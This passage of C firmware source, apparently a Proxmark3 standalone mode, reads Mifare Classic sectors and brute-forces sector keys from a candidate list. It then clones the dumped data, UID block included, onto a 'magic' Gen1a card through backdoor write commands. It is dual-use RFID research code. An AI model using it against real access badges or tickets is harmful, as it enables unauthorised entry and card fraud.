AUTH_NESTED)) { isOK = false; break; } } for (uint8_t blockNo = 0; isOK && blockNo < NumBlocksPerSector(s); blockNo++) { if (isOK && mifare_classic_readblock(pcs, cjcuid, FirstBlockOfSector(s) + blockNo, dataoutbuf)) { isOK = false; break; }; if (isOK) { if (blockNo < NumBlocksPerSector(s) - 1) { emlSetMem(dataoutbuf, FirstBlockOfSector(s) + blockNo, 1); } else { // sector trailer, keep the keys, set only the AC emlGetMem(dataoutbuf2, FirstBlockOfSector(s) + blockNo, 1); memcpy(&dataoutbuf2[6], &dataoutbuf[6], 4); emlSetMem(dataoutbuf2, FirstBlockOfSector(s) + blockNo, 1); } } } } int res = mifare_classic_halt(pcs, cjcuid); (void)res; crypto1_deinit(pcs); FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); return (isOK) ? PM3_SUCCESS : PM3_EUNDEF; } /* the chk function is a piwi'ed(tm) check that will try all keys for a particular sector. also no tracing no dbg */ int cjat91_saMifareChkKeys(uint8_t blockNo, uint8_t keyType, bool clearTrace, uint8_t keyCount, uint8_t *datain, uint64_t *key) { iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN); set_tracing(false); struct Crypto1State mpcs = {0, 0}; struct Crypto1State *pcs; pcs = &mpcs; int retval = -1; for (uint8_t i = 0; i < keyCount; i++) { /* no need for anticollision. just verify tag is still here */ // if (!iso14443a_fast_select_card(cjuid, 0)) { if (!iso14443a_select_card(cjuid, &p_card, &cjcuid, true, 0, true)) { cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "%sFATAL%s : E_MF_LOSTTAG", _XRED_, _XWHITE_); break; } uint64_t ui64Key = bytes_to_num(datain + i * 6, 6); if (mifare_classic_auth(pcs, cjcuid, blockNo, keyType, ui64Key, AUTH_FIRST)) { uint8_t dummy_answer = 0; ReaderTransmit(&dummy_answer, 1, NULL); // wait for the card to become ready again SpinDelayUs(AUTHENTICATION_TIMEOUT); continue; } *key = ui64Key; retval = i; break; } crypto1_deinit(pcs); FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); return retval; } void saMifareMakeTag(void) { uint8_t cfail = 0; cjSetCursLeft(); cjTabulize(); vtsend_cursor_position_save(NULL); vtsend_set_attribute(NULL, 1); DbprintfEx(FLAG_NEWLINE, "[ CLONING ]"); vtsend_set_attribute(NULL, 0); cjSetCursFRight(); DbprintfEx(FLAG_NEWLINE, ">> Write to Special:"); int flags = 0; for (int blockNum = 0; blockNum < 16 * 4; blockNum++) { uint8_t mblock[16]; emlGetMem(mblock, blockNum, 1); // switch on field and send magic sequence if (blockNum == 0) flags = 0x08 + 0x02; // just write if (blockNum == 1) flags = 0; // Done. Magic Halt and switch off field. if (blockNum == 16 * 4 - 1) flags = 0x04 + 0x10; if (saMifareCSetBlock(0, flags & 0xFE, blockNum, mblock)) { cjSetCursFRight(); if (currfline > 53) { currfline = 54; } DbprintfEx(FLAG_NEWLINE, "Block :%02x %sOK%s", blockNum, _XGREEN_, _XWHITE_); continue; } else { cjSetCursLeft(); cjSetCursLeft(); DbprintfEx(FLAG_NEWLINE, "`--> %sFAIL%s : CHN_FAIL_BLK_%02x_NOK", _XRED_, _XWHITE_, blockNum); cjSetCursFRight(); DbprintfEx(FLAG_NEWLINE, "%s>>>>%s STOP AT %02x", _XRED_, _XWHITE_, blockNum); cfail++; break; } cjSetCursFRight(); DbprintfEx(FLAG_NEWLINE, "%s>>>>>>>> END <<<<<<<<%s", _XYELLOW_, _XWHITE_); } if (cfail == 0) { SpinUp(50); SpinUp(50); SpinUp(50); } } // TODO : make this work either for a Gen1a or for a block 0 direct write all transparently //----------------------------------------------------------------------------- // Matt's StandAlone mod. // Work with "magic Chinese" card (email him: ouyangweidaxian@live.cn) //----------------------------------------------------------------------------- int saMifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain) { // params uint8_t needWipe = arg0; // bit 0 - need get UID // bit 1 - need wupC // bit 2 - need HALT after sequence // bit 3 - need init FPGA and field before sequence // bit 4 - need reset FPGA and LED uint8_t workFlags = arg1; uint8_t blockNo = arg2; // card commands uint8_t wupC1[] = {0x40}; uint8_t wupC2[] = {0x43}; uint8_t wipeC[] = {0x41}; // variables uint8_t isOK = 0; uint8_t d_block[18] = {0x00}; uint8_t receivedAnswer[MAX_MIFARE_FRAME_SIZE]; uint8_t receivedAnswerPar[MAX_MIFARE_PARITY_SIZE]; // reset FPGA and LED if (workFlags & 0x08) { iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN); // clear_trace(); set_tracing(FALSE); } while (true) { cjSetCursLeft(); // get UID from chip if (workFlags & 0x01) { if (!iso14443a_select_card(cjuid, &p_card, &cjcuid, true, 0, true)) { DbprintfEx(FLAG_NEWLINE, "Can't select card"); break; }; if (mifare_classic_halt(NULL, cjcuid)) { DbprintfEx(FLAG_NEWLINE, "Halt error"); break; }; }; // reset chip if (needWipe) { ReaderTransmitBitsPar(wupC1, 7, 0, NULL); if (!ReaderReceive(receivedAnswer, receivedAnswerPar) || (receivedAnswer[0] != 0x0a)) { DbprintfEx(FLAG_NEWLINE, "wupC1 error"); break; }; ReaderTransmit(wipeC, sizeof(wipeC), NULL); if (!ReaderReceive(receivedAnswer, receivedAnswerPar) || (receivedAnswer[0] != 0x0a)) { DbprintfEx(FLAG_NEWLINE, "wipeC error"); break; }; if (mifare_classic_halt(NULL, cjcuid)) { DbprintfEx(FLAG_NEWLINE, "Halt error"); break; }; }; // chaud // write block if (workFlags & 0x02) { ReaderTransmitBitsPar(wupC1, 7, 0, NULL); if (!ReaderReceive(receivedAnswer, receivedAnswerPar) || (receivedAnswer[0] != 0x0a)) { DbprintfEx(FLAG_NEWLINE, "wupC1 error"); break; }; ReaderTransmit(wupC2, sizeof(wupC2), NULL); if (!ReaderReceive(receivedAnswer, receivedAnswerPar) || (receivedAnswer[0] != 0x0a)) { DbprintfEx(FLAG_NEWLINE, "wupC2 errorv"); break; }; } if ((mifare_sendcmd_short(NULL, CRYPT_NONE, 0xA0, blockNo, receivedAnswer, receivedAnswerPar, NULL) != 1) || (receivedAnswer[0] != 0x0a)) { DbprintfEx(FLAG_NEWLINE, "write block send command error"); break; }; memcpy(d_block, datain, 16); AddCrc14A(d_block, 16); ReaderTransmit(d_block, sizeof(d_block), NULL); if ((ReaderReceive(receivedAnswer, receivedAnswerPar) != 1) || (receivedAnswer[0] != 0x0a)) { DbprintfEx(FLAG_NEWLINE, "write block send data error"); break; }; if (workFlags & 0x04) { if (mifare_classic_halt(NULL, cjcuid)) { cjSetCursFRight(); DbprintfEx(FLAG_NEWLINE, "Halt error"); break; }; } isOK = 1; break; } if ((workFlags & 0x10) || (!isOK)) { FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); } return isOK; }